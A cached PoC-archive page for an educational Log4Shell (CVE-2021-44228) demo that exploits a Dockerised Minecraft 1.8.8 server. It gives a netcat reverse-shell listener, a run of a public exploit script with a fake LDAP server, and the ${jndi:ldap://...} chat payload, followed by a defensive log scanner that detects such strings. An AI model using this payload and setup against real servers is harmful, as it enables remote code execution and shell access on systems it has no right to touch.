PoC details: 6963bb0571419f1998cec29856192d6dda3c7412

Source
Related vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Foundation in the United States. Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j; when that request is written to a log, remote code execution is triggered.
Description
Log4Shell (CVE-2021-44228) Minecraft demo. Used for education fairs.
Introduction
# Log4Shell (CVE-2021-44228) minecraft demo
This demo is used at education fairs to give potential future students an idea of the cybersecurity department at HTL Villach and of how everyday applications can be exploited.


**Note:** This entire demo uses Minecraft 1.8.8
## Attacker
The attacker in this scenario is using the PoC by kozmer. https://github.com/kozmer/log4j-shell-poc
All credit belongs to them. 
**Note:** All commands need to be executed in attacker/

#### Requirements:
```bash
pip install -r requirements.txt
```
#### Usage:


* Start a netcat listener to accept the reverse shell connection.<br>
```bash
nc -lvnp 9001
```
* Launch the exploit.<br>
**Note:** For this to work, the extracted Java archive has to be named `jdk1.8.0_20` and be in the same directory. 
```bash
$ python3 poc.py --userip <ip of docker-host> --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<ip of docker-host>:1389/a}

Listening on 0.0.0.0:1389
```


This script will set up the HTTP server and the LDAP server for you, and it will also create the payload string that you paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the listener port (`--lport`).

<br>

## Victim
On the victim instance we are using an outdated and therefore [vulnerable version of the JDK (jdk1.8.0_20)](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).

#### Initial setup


To get our Minecraft server running we have to build our Docker image and run it.

**Note:** For a successful build you need to obtain your own copy of the Minecraft Vanilla 1.8.8 Server *(can't be shared because of Mojang's EULA)*
A possible source could be [MCVERSIONS.NET](https://mcversions.net/download/1.8.8)

After obtaining the file, save it in victim/ as `server.jar`.

```bash
# The Dockerfile lives in victim/ (see the file snapshot), next to server.jar
cd victim/
docker build . -t minecraft-demo
```

#### Running the vulnerable server
Run the vulnerable Minecraft server we just built using Docker:
```bash
docker run --name vulnerable-server -p 25565:25565 minecraft-demo
```
It's likely that your container freezes or gets stuck after exploitation. In that case you can kill it using the following command:
```bash
docker kill vulnerable-server
```

#### Exploiting the server

To exploit the vulnerability, simply send the string printed by *poc.py* in the game chat:
```
${jndi:ldap://<ip of docker-host>:1389/a}
```
![image](https://github.com/felixslama/log4shell-minecraft-demo/assets/79058712/b3cc9c19-ca14-456c-bf7f-7246bb6adf58)
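A defender-side check tied to this demo, added here and not part of the original repository: the server writes every chat message to its log (which is exactly why the lookup fires), so the same log is where a `${jndi:...}` string can be spotted. The scanner below is example code; it assumes the Minecraft 1.8.8 chat log line format shown in the constructed sample, and it also matches the other JNDI schemes Log4j can resolve, not only the `ldap` form used on this page.

```python
import re
from typing import Optional

# Log4j lookup as it appears inside a logged chat message. The trailing path is
# whatever the fake LDAP server is asked for ("/a" in the demo). Schemes other
# than ldap are the further JNDI providers Log4j can resolve (assumption: the
# demo itself only uses ldap).
JNDI_RE = re.compile(
    r"\$\{\s*jndi:(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|https?)://"
    r"(?P<host>[^:/\s}]+)(?::(?P<port>\d{1,5}))?(?P<path>/[^}\s]*)?\s*\}",
    re.IGNORECASE,
)

# Assumed Minecraft 1.8.8 chat line: [HH:MM:SS] [Server thread/INFO]: <name> message
CHAT_RE = re.compile(
    r"^\[(?P<time>\d{2}:\d{2}:\d{2})\] \[[^\]]+/INFO\]: <(?P<player>[^>]+)> (?P<msg>.*)$"
)

def scan_line(line: str) -> Optional[dict]:
    """Return details of a JNDI lookup found in one server log line, or None."""
    m = JNDI_RE.search(line)
    if not m:
        return None
    hit = {
        "scheme": m.group("scheme").lower(),
        "host": m.group("host"),
        "port": int(m.group("port")) if m.group("port") else None,
        "path": m.group("path") or "",
        "raw": m.group(0),
    }
    chat = CHAT_RE.match(line)
    if chat:  # attribute the lookup to the player who sent it
        hit["time"] = chat.group("time")
        hit["player"] = chat.group("player")
    return hit

def scan_log(lines):
    """Scan an iterable of log lines and return every JNDI hit found."""
    return [h for h in (scan_line(l) for l in lines) if h]

# Constructed sample log excerpt (not captured from a real server).
SAMPLE_LOG = """[20:14:01] [Server thread/INFO]: Steve[/10.0.0.7:51234] logged in with entity id 3
[20:14:05] [Server thread/INFO]: <Steve> hello everyone
[20:14:09] [Server thread/INFO]: <Steve> ${jndi:ldap://10.0.0.5:1389/a}
[20:14:12] [Server thread/INFO]: <Alex> the price is ${money} lol
""".splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} player={hit['player']} scheme={hit['scheme']} "
              f"host={hit['host']} port={hit['port']} path={hit['path']}")
```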
File snapshot

```
[4.0K] /data/pocs/6963bb0571419f1998cec29856192d6dda3c7412
├── [4.0K] attacker
│   ├── [4.1K] poc.py
│   ├── [  17] requirements.txt
│   └── [4.0K] target
│       ├── [1.8M] log4shell-1.0-SNAPSHOT.war
│       └── [ 41M] marshalsec-0.0.3-SNAPSHOT-all.jar
├── [1.0K] LICENSE
├── [2.6K] README.md
└── [4.0K] victim
    └── [ 295] Dockerfile

3 directories, 7 files
```
The Shenlong bot has cached this for you.
Notes
    1. It is recommended to access the PoC via its source first.
    2. If the source has disappeared or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.